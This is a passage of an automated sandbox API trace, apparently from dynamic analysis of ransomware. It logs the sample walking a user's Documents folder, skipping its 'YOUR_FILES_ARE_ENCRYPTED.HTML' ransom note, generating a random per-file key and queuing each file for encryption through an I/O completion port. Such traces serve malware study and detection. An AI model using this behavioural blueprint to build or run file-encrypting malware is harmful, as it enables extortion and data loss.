Flags=0x8, Size=0x28150) returned 0x7690008 [0166.963] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="3B") returned 2 [0166.963] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="A1") returned 2 [0166.963] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="70") returned 2 [0166.963] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="F0") returned 2 [0166.963] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="FE") returned 2 [0166.963] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="ED") returned 2 [0166.963] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="52") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="98") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="5A") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="04") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="A9") 
returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="B0") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="9F") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="A4") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="62") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="96") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="B1") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="75") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="76") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="83") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="F1") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="C1") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="2D") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="ED") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="BB") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="AA") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="6C") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="A7") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="D4") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="47") returned 2 [0166.965] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="3C") returned 2 [0166.965] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="06") returned 2 [0166.965] lstrcpyW (in: lpString1=0x76a00bc, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\emzcTg-B_FsWzZV.pptx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\emzcTg-B_FsWzZV.pptx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\emzcTg-B_FsWzZV.pptx" [0166.965] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.965] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.975] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec7dc200, ftCreationTime.dwHighDateTime=0x1d7d998, ftLastAccessTime.dwLowDateTime=0x2aa4aac0, ftLastAccessTime.dwHighDateTime=0x1d7e110, ftLastWriteTime.dwLowDateTime=0x2aa4aac0, ftLastWriteTime.dwHighDateTime=0x1d7e110, nFileSizeHigh=0x0, nFileSizeLow=0x1ebb, dwReserved0=0x151515, dwReserved1=0x0, cFileName="gBnhtCOAvLr0Ffw.doc", cAlternateFileName="GBNHTC~1.DOC")) returned 1 [0166.975] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\gBnhtCOAvLr0Ffw.doc") returned 61 [0166.975] lstrcmpW (lpString1="gBnhtCOAvLr0Ffw.doc", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.975] PathFindExtensionW (pszPath="gBnhtCOAvLr0Ffw.doc") returned=".doc" [0166.975] lstrlenW (lpString=".doc") returned 4 [0166.975] PathFindExtensionW (pszPath="gBnhtCOAvLr0Ffw.doc") returned=".doc" [0166.975] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.975] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\gBnhtCOAvLr0Ffw.doc" (normalized: "c:\\users\\5alr3u30d3\\documents\\lil9-3r\\gbnhtcoavlr0ffw.doc"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.976] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=7867) returned 1 [0166.976] GetProcessHeap () returned 0x270000 [0166.976] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.977] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="E5") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="42") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="7B") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="1D") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="A8") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="83") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="44") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="CA") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="26") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="B3") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="93") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="46") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="27") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="67") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="E1") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="82") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="9E") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="A4") returned 2 
[0166.977] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="72") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="AD") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="39") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="D3") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="F8") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="E6") returned 2 [0166.978] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="17") returned 2 [0166.978] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="E7") returned 2 [0166.978] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="00") returned 2 [0166.978] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="81") returned 2 [0166.978] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="38") returned 2 [0166.978] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="35") returned 2 [0166.978] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="4B") returned 2 [0166.978] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="24") returned 2 [0166.978] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\gBnhtCOAvLr0Ffw.doc" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\gBnhtCOAvLr0Ffw.doc") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\gBnhtCOAvLr0Ffw.doc" [0166.979] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.979] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.987] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: 
lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91120430, ftCreationTime.dwHighDateTime=0x1d7e5b4, ftLastAccessTime.dwLowDateTime=0xd6086530, ftLastAccessTime.dwHighDateTime=0x1d7e6c1, ftLastWriteTime.dwLowDateTime=0xd6086530, ftLastWriteTime.dwHighDateTime=0x1d7e6c1, nFileSizeHigh=0x0, nFileSizeLow=0x729c, dwReserved0=0x151515, dwReserved1=0x0, cFileName="I8HYT6gle-d_.csv", cAlternateFileName="I8HYT6~1.CSV")) returned 1 [0166.987] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\I8HYT6gle-d_.csv") returned 58 [0166.987] lstrcmpW (lpString1="I8HYT6gle-d_.csv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.987] PathFindExtensionW (pszPath="I8HYT6gle-d_.csv") returned=".csv" [0166.987] lstrlenW (lpString=".csv") returned 4 [0166.987] PathFindExtensionW (pszPath="I8HYT6gle-d_.csv") returned=".csv" [0166.987] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\I8HYT6gle-d_.csv" (normalized: "c:\\users\\5alr3u30d3\\documents\\lil9-3r\\i8hyt6gle-d_.csv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.988] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=29340) returned 1 [0166.988] GetProcessHeap () returned 0x270000 [0166.988] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.989] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="51") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="9D") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="C6") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | 
out: param_1="C0") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="8F") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="95") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="05") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="9F") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="FE") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="29") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="76") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="1A") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="D1") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="65") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="1C") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="20") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="C0") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="9E") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="B8") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="B0") returned 2 [0166.990] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="B4") returned 2 [0166.990] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="6E") returned 2 [0166.990] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="FD") returned 2 [0166.990] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="5D") returned 2 [0166.990] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="FD") returned 2 [0166.990] wsprintfW (in: 
param_1=0x4ebda9a, param_2="%02X" | out: param_1="F0") returned 2 [0166.990] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="09") returned 2 [0166.990] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="82") returned 2 [0166.990] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="55") returned 2 [0166.990] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="A0") returned 2 [0166.990] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="49") returned 2 [0166.990] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="2C") returned 2 [0166.991] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\I8HYT6gle-d_.csv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\I8HYT6gle-d_.csv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\I8HYT6gle-d_.csv" [0166.991] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.991] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0167.002] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c0dab0, ftCreationTime.dwHighDateTime=0x1d7dffb, ftLastAccessTime.dwLowDateTime=0xa83198f0, ftLastAccessTime.dwHighDateTime=0x1d7e0c9, ftLastWriteTime.dwLowDateTime=0xa83198f0, ftLastWriteTime.dwHighDateTime=0x1d7e0c9, nFileSizeHigh=0x0, nFileSizeLow=0xc3e4, dwReserved0=0x151515, dwReserved1=0x0, cFileName="JXoeufXBs.ots", cAlternateFileName="JXOEUF~1.OTS")) returned 1 [0167.002] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\JXoeufXBs.ots") returned 55 [0167.002] lstrcmpW (lpString1="JXoeufXBs.ots", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.002] PathFindExtensionW (pszPath="JXoeufXBs.ots") returned=".ots" [0167.002] lstrlenW (lpString=".ots") returned 4 [0167.002] PathFindExtensionW (pszPath="JXoeufXBs.ots") returned=".ots" [0167.002] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf687a7e0, ftCreationTime.dwHighDateTime=0x1d7e50d, ftLastAccessTime.dwLowDateTime=0xcdacac30, ftLastAccessTime.dwHighDateTime=0x1d7e61b, ftLastWriteTime.dwLowDateTime=0xcdacac30, ftLastWriteTime.dwHighDateTime=0x1d7e61b, nFileSizeHigh=0x0, nFileSizeLow=0x73ea, dwReserved0=0x151515, dwReserved1=0x0, cFileName="sIJyL8HKTPr6.ppt", cAlternateFileName="SIJYL8~1.PPT")) returned 1 [0167.002] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\sIJyL8HKTPr6.ppt") returned 58 [0167.002] lstrcmpW (lpString1="sIJyL8HKTPr6.ppt", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.002] PathFindExtensionW (pszPath="sIJyL8HKTPr6.ppt") returned=".ppt" [0167.003] lstrlenW (lpString=".ppt") returned 4 [0167.003] PathFindExtensionW (pszPath="sIJyL8HKTPr6.ppt") returned=".ppt" [0167.003] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\sIJyL8HKTPr6.ppt" (normalized: "c:\\users\\5alr3u30d3\\documents\\lil9-3r\\sijyl8hktpr6.ppt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.005] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=29674) returned 1 [0167.005] GetProcessHeap () returned 0x270000 [0167.005] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 
[0167.006] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="0F") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="54") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="30") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="AD") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="71") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="72") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="54") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="95") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="1B") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="6E") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="20") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="84") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="D8") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="75") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="36") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="F4") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="4F") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="26") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="DB") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="96") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="51") returned 2 [0167.006] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: 
param_1="3F") returned 2 [0167.007] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="3D") returned 2 [0167.007] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="5D") returned 2 [0167.007] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="14") returned 2 [0167.007] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="B4") returned 2 [0167.007] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="A2") returned 2 [0167.007] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="DA") returned 2 [0167.007] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="E7") returned 2 [0167.007] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="77") returned 2 [0167.007] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="8A") returned 2 [0167.007] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="5E") returned 2 [0167.008] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\sIJyL8HKTPr6.ppt" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\sIJyL8HKTPr6.ppt") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\sIJyL8HKTPr6.ppt" [0167.008] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.008] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0167.016] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5eba540, ftCreationTime.dwHighDateTime=0x1d7e773, ftLastAccessTime.dwLowDateTime=0x284dd9a0, ftLastAccessTime.dwHighDateTime=0x1d7e78b, ftLastWriteTime.dwLowDateTime=0x284dd9a0, ftLastWriteTime.dwHighDateTime=0x1d7e78b, nFileSizeHigh=0x0, nFileSizeLow=0x6f89, dwReserved0=0x151515, 
dwReserved1=0x0, cFileName="vrGluN.doc", cAlternateFileName="")) returned 1 [0167.016] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\vrGluN.doc") returned 52 [0167.016] lstrcmpW (lpString1="vrGluN.doc", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.016] PathFindExtensionW (pszPath="vrGluN.doc") returned=".doc" [0167.016] lstrlenW (lpString=".doc") returned 4 [0167.016] PathFindExtensionW (pszPath="vrGluN.doc") returned=".doc" [0167.016] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\vrGluN.doc" (normalized: "c:\\users\\5alr3u30d3\\documents\\lil9-3r\\vrglun.doc"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.017] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=28553) returned 1 [0167.017] GetProcessHeap () returned 0x270000 [0167.017] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0167.018] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="FB") returned 2 [0167.018] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="DC") returned 2 [0167.018] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="D0") returned 2 [0167.018] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="F0") returned 2 [0167.018] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="AA") returned 2 [0167.018] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="FC") returned 2 [0167.018] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="33") returned 2 [0167.018] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="D6") returned 2 [0167.018] wsprintfW 
(in: param_1=0x4ebda56, param_2="%02X" | out: param_1="DD") returned 2 [0167.018] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="54") returned 2 [0167.018] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="FE") returned 2 [0167.018] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="86") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="7D") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="52") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="C3") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="0E") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="5A") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="37") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="8C") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="AC") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="1E") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="9C") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="88") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="FC") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="39") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="9A") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="9F") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="3A") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="C8") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="16") 
returned 2 [0167.019] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="59") returned 2 [0167.019] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="73") returned 2 [0167.020] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\vrGluN.doc" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\vrGluN.doc") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\vrGluN.doc" [0167.020] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.020] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0167.028] FindNextFileW (in: hFindFile=0x42f3180, 